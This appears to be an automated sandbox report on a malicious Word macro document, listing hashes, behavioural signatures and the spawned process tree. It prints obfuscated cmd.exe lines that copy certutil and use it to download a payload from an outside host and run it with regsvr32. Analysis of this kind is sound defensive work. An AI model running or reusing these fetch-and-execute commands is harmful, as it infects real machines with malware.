Analysis
- max time kernel: 135s
- max time network: 133s
- platform: windows10_x64
- resource: win10
- submitted: 28-07-2020 19:08
Static task: static1
Behavioral task: behavioral1
- Sample: document,07.20.doc
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: document,07.20.doc
- Resource: win10
General
- Target: document,07.20.doc
- Size: 110KB
- MD5: 30511605bee5a35ff80fde0de0105bd4
- SHA1: 8c5f42a5142a86e0ac4819f34340ac7e6ea498a2
- SHA256: b156c9ad046d0d4b174f7308bd3b965f4425b1dfa38e7dc19e6e1eb54b0b49a1
- SHA512: fe953141f28c7aaa59c478fb497170882ed578076d2b9e483f02b309484aa6b4447d0aa6104ef1b38efae8691740ab42b5ddca8adfd66013b7f1094042d7e623
Malware Config
Signatures
- An obfuscated cmd.exe command-line is typically used to evade detection (1 IoC)
  Processes:
    pid  | process
    1540 | cmd.exe
- Loads dropped DLL (1 IoC)
  Processes:
    pid  | process
    1308 | regsvr32.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid  | process
    1308 | regsvr32.exe
    1308 | regsvr32.exe
- Suspicious use of SetWindowsHookEx (18 IoCs)
  Processes:
    pid  | process
    3932 | WINWORD.EXE (the same row is repeated 18 times)
- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3832 | 3932 | cmd.exe | WINWORD.EXE
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 1540 | 3932 | cmd.exe | WINWORD.EXE
- Suspicious use of WriteProcessMemory (11 IoCs)
  Processes:
    description | pid | process | target process
    PID 3932 wrote to memory of 3832 | 3932 | WINWORD.EXE | cmd.exe
    PID 3932 wrote to memory of 3832 | 3932 | WINWORD.EXE | cmd.exe
    PID 3932 wrote to memory of 1540 | 3932 | WINWORD.EXE | cmd.exe
    PID 3932 wrote to memory of 1540 | 3932 | WINWORD.EXE | cmd.exe
    PID 1540 wrote to memory of 3788 | 1540 | cmd.exe | 1.exe
    PID 1540 wrote to memory of 3788 | 1540 | cmd.exe | 1.exe
    PID 1540 wrote to memory of 3004 | 1540 | cmd.exe | regsvr32.exe
    PID 1540 wrote to memory of 3004 | 1540 | cmd.exe | regsvr32.exe
    PID 3004 wrote to memory of 1308 | 3004 | regsvr32.exe | regsvr32.exe
    PID 3004 wrote to memory of 1308 | 3004 | regsvr32.exe | regsvr32.exe
    PID 3004 wrote to memory of 1308 | 3004 | regsvr32.exe | regsvr32.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
    pid  | process
    3932 | WINWORD.EXE
    3932 | WINWORD.EXE
- Executes dropped EXE (1 IoC)
  Processes:
    pid  | process
    3788 | 1.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 3932)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document,07.20.doc" /o ""
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
    - C:\Windows\System32\cmd.exe (PID 3832)
      Command line: "C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
      - Process spawned unexpected child process
    - C:\Windows\System32\cmd.exe (PID 1540)
      Command line: "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
        - C:\ProgramData\1.exe (PID 3788)
          Command line: C:\ProgramData\1.exe /urlcache /f http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp
          - Executes dropped EXE
        - C:\Windows\system32\regsvr32.exe (PID 3004)
          Command line: regsvr32 C:\ProgramData\1.tmp
          - Suspicious use of WriteProcessMemory
            - C:\Windows\SysWOW64\regsvr32.exe (PID 1308)
              Command line: C:\ProgramData\1.tmp
              - Loads dropped DLL
              - Suspicious behavior: EnumeratesProcesses